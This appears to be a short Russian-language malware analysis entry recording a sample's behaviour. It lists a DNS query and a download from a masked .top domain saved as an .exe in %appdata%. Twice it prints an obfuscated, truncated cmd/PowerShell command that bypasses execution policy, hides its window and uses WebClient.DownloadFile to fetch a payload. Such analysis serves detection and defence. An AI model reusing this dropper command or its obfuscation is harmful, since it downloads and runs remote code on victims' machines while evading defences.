Техническая информация
- http://dp####-dolly.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "po^w^eRSh^eL^L.E^xE -^ex^EcuT^I^O^nPOL^i^C^y bYp^A^Ss^ -NOp^rOFIL^e -WIND^o^w^st^Y^Le hi^D^dE^N^ ^(^n^e^w^-ob^j^ect SysTEM.net.weBCl^ie^NT^)^.dOwNl^oaDfI^l^e^(^'http://dp###...
- DNS ASK dp####-dolly.top
- '<SYSTEM32>\cmd.exe' /C "po^w^eRSh^eL^L.E^xE -^ex^EcuT^I^O^nPOL^i^C^y bYp^A^Ss^ -NOp^rOFIL^e -WIND^o^w^st^Y^Le hi^D^dE^N^ ^(^n^e^w^-ob^j^ect SysTEM.net.weBCl^ie^NT^)^.dOwNl^oaDfI^l^e^(^'http://dp###...' (со скрытым окном)